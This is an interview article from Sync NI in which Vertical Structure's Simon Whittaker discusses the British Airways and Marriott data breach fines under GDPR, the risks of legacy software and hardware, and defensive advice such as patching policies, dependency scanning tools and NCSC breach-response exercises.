It's been a busy month in the cyber-security and infosec fields, with several major fines being issued against UK companies suffering data breaches as a result of poor security.
British Airways was hit with a record fine of £183m for a breach involving customer data (including credit card details) being stolen by attackers, and then Mariott was hit was fined £99m for a similar data breach.
Both of these fines come under the EU General Data Protection Regulation (GDPR), which makes a company liable to pay fines of up to 2-4% of its annual turnover for data breaches involving personal information of customers if it can be shown that the company failed in some capacity to secure the data. This has turned the tech landscape into a minefield for
firms running old legacy software or hardware with dubious security.
Sync NI caught up with Vertical Structure's Simon Whittakerto get his thoughts on how security concerns could have been addressed in these recent cases, how companies should handle security with legacy systems, and what can be done to avoid those monumental GDPR fines if the worst happens.
Sync NI: You’ve been following the BA and Mariott cases with keen interest from a cyber-security angle, what do you think went wrong in these cases?Simon Whittaker: As is the case in the majority of breaches, this appears to be a chain of events leading from one small issue, which have resulted in a massive compromise. In BA's case, it appears that a single file was compromised with approximately 20 lines of code which captured mouse events and pushed form data (credit card and personal data) to a different site with a similar looking domain name. In this case the attackers were very thorough, their use of a domain name which was plausible (baways.com) and a valid secure certificate on that domain proves this.
The British Airways breach turned out to be due to a piece of Javascript the firm hadn’t updated since 2012. Could other major firms have time bombs like this lurking in their systems?Absolutely, keeping packages updated is really hard, in many cases even knowing what packages are in use can be tough. It is a known issue with the majority of firms that we work with, the important thing is to try and understand the potential threats and to mitigate them to the best of your ability.
It is also important to be aware that the issue here was that the attackers had write access to code and were able to have it deployed, they could just have easily defaced the web site and apps with political messages but instead went for the money.
What are the most common mistakes you see companies make with legacy software systems, and is there any general advice all companies can use to prevent this happening to them too?It is vital that companies recognise the threats which they are facing, the worst thing any company can do is to put their head in the sand and pretend everything will be fine.
A major problem we see is that organisations put devices onto the internet with little to no protection, we demonstrated this recently when we identified and responsibly
disclosed a flaw with some Lenovo NAS devices which allowed any anonymous user access to all files. If these devices are directly attached to the internet that means *anyone* could access your most personal details.
Another key point to take away is that you should be prepared for a breach and have plans in place to help deal with when it does happen. We have been helping some organisations with this response using tools like the free and brilliant Exercise in a Box service from the National Cyber Security Centre. This allows companies to role play incidents in a safe environment and understand the steps they would take.
Many companies rely on third party software and stay on old versions for compatibility reasons or to prevent an automatic update breaking their system. Can companies design around this, or is it a case of continually re-evaluating third party software they use?It is vitally important to be aware of the software that you're using and help to understand the source of libraries in use. As previously stated though, keeping software updated is hard. In accordance with the CyberEssentials and NCSC guidance, we suggest that organisations have a patching policy and that this should extend to libraries and software. If the developer of the library says it's important for you to update then it's probably best to heed their advice.
It is also possible to use tools to keep you up to date, Github offer some brilliant tools which scan your repositories regularly and tell you of issues, npm has a tool called retire, OWASP have a tool called OWASP Dependency Check and there are other tools available as well. Great
advice is available from OWASP as well.
The size of the British Airways fine has revealed the scale of the financial damage that can be caused by not keeping systems updated. Do you think this makes the case for investing a much larger portion of tech budgets in re-engineering old systems?It is important to stress that this is ICO's notice of intention to fine, not a fine immediately. It could be a while before we know the full extent of any fine but that are really interesting first moves by the ICO. It is possible that these fine amounts could be cut or removed entirely during the process.
It is also likely that we'll be hearing some news about the ticketmaster breach from 2018 over the next weeks and months. As previously stated, the first step is to know what you're using and then to work hard to mitigate the risks which you locate. Evidence based Threat Modelling is a brilliant tool to use for this.
More recently Vertical Structure broke the story of the vulnerability in old Lenovo Iomega NAS devices. How would you suggest companies tackle the issue of legacy hardware?These are old devices and I'm not overly surprised that they are vulnerable. The thing that is most concerning here is that they are allowed onto the public internet with no basic protection in place, why are the files publicly facing? We worked with an ISO27001 auditor a few years ago who suggested publicly facing NAS devices as a replacement to use of cloud infrastructure, I disagreed then and I disagree now.
As far as advice goes, I would suggest the following:
- Set a baseline level of security and test to it including thinking about what services are being exposed to the internet. In the UK
we have the CyberEssentials scheme which is designed to provide a basic level of security assurance and is supported by local cyber crime units and the
National Cyber Security Centre.
- Get a relationship with your local cyber law enforcement representatives, in Northern Ireland and the UK there are regional PROTECT teams, learn their names and keep in touch, they're lovely people.
- It is also worthwhile testing your infrastructure to understand your exposure, you can do this for free or obviously engage a cyber security organisation to provide expert guidance. Don't stick your head in the sand!
Finally, plan towards the fact that a breach
will happen. Again, the NCSC in the UK provides some incredible resources to help with your response. Test out how you would respond to issues with
the NCSC Exercise in a Box - this is a free tool to help you respond to issues more effectively.
Thanks for your time, Simon! 
